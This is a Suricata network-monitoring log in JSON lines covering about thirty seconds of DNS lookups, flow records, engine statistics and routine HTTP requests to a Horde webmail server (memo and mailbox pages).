{"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:11.001346+0000","flow_id":1075243643438853,"event_type":"flow","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:10.657157+0000","end":"2020-02-29T00:08:10.765374+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:11.031139+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088}} {"timestamp":"2020-02-29T00:13:12.000321+0000","event_type":"stats","stats":{"uptime":14444,"capture":{"kernel_packets":135387,"kernel_drops":0},"decoder":{"pkts":135402,"bytes":93311937,"invalid":187,"ipv4":133907,"ipv6":8,"ethernet":135402,"raw":0,"null":0,"sll":0,"tcp":128611,"udp":5094,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2768,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2784,"synack":2775,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1807,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2327,"failed_udp":111},"tx":{"http":4659,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2407}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2373,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22807,"memcap_state":0,"memcap_global":0},"http":{"memuse":125920,"memcap":0}}} {"timestamp":"2020-02-29T00:13:12.002010+0000","flow_id":417014135629625,"event_type":"flow","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:11.108345+0000","end":"2020-02-29T00:08:11.216826+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:12.019322+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64358,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:12.184452+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:13:15.783714+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":2}} {"timestamp":"2020-02-29T00:13:16.036811+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34814,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38922,"tx_id":0}} {"timestamp":"2020-02-29T00:13:17.187207+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34816,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:13:18.890267+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:19.000188+0000","event_type":"stats","stats":{"uptime":14451,"capture":{"kernel_packets":135471,"kernel_drops":0},"decoder":{"pkts":135474,"bytes":93343332,"invalid":187,"ipv4":133979,"ipv6":8,"ethernet":135474,"raw":0,"null":0,"sll":0,"tcp":128673,"udp":5104,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2770,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2786,"synack":2777,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1809,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2331,"failed_udp":112},"tx":{"http":4663,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2411}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2375,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23138,"memcap_state":0,"memcap_global":0},"http":{"memuse":78933,"memcap":0}}} {"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} {"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:13:21.000327+0000","flow_id":1573653137124388,"event_type":"flow","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":5991,"start":"2020-02-29T00:11:40.125988+0000","end":"2020-02-29T00:12:20.586218+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:21.000929+0000","flow_id":957166403243598,"event_type":"flow","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:20.380494+0000","end":"2020-02-29T00:08:20.488895+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:24.094571+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:13:24.749341+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57609,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:13:26.000189+0000","event_type":"stats","stats":{"uptime":14458,"capture":{"kernel_packets":135481,"kernel_drops":0},"decoder":{"pkts":135483,"bytes":93345767,"invalid":187,"ipv4":133988,"ipv6":8,"ethernet":135483,"raw":0,"null":0,"sll":0,"tcp":128680,"udp":5106,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2771,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2787,"synack":2778,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1810,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2332,"failed_udp":112},"tx":{"http":4664,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2412}},"flow_mgr":{"closed_pruned":2745,"new_pruned":15,"est_pruned":2376,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":109003,"memcap":0}}} {"timestamp":"2020-02-29T00:13:27.000158+0000","flow_id":427648475654620,"event_type":"flow","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:26.322012+0000","end":"2020-02-29T00:08:26.430911+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:28.000628+0000","flow_id":58766619475456,"event_type":"flow","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-29T00:08:26.884224+0000","end":"2020-02-29T00:08:27.119823+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:29.881739+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34818,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:13:31.000242+0000","flow_id":1144822130078229,"event_type":"flow","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6580,"start":"2020-02-29T00:12:20.586261+0000","end":"2020-02-29T00:12:30.427636+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:31.396069+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56583,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":205,"tx_id":0}} {"timestamp":"2020-02-29T00:13:31.570323+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57985,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:31.777304+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052}} {"timestamp":"2020-02-29T00:13:33.000151+0000","event_type":"stats","stats":{"uptime":14465,"capture":{"kernel_packets":135505,"kernel_drops":0},"decoder":{"pkts":135522,"bytes":93356849,"invalid":187,"ipv4":134023,"ipv6":8,"ethernet":135522,"raw":0,"null":0,"sll":0,"tcp":128709,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2746,"new_pruned":15,"est_pruned":2378,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":121715,"memcap":0}}} {"timestamp":"2020-02-29T00:13:33.001385+0000","flow_id":204108328578649,"event_type":"flow","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1215,"bytes_toclient":7636,"start":"2020-02-29T00:12:27.634457+0000","end":"2020-02-29T00:12:32.916036+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:36.778490+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34820,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":21937,"tx_id":1}} {"timestamp":"2020-02-29T00:13:39.000406+0000","flow_id":1562984426416529,"event_type":"flow","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:38.305553+0000","end":"2020-02-29T00:08:38.414838+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 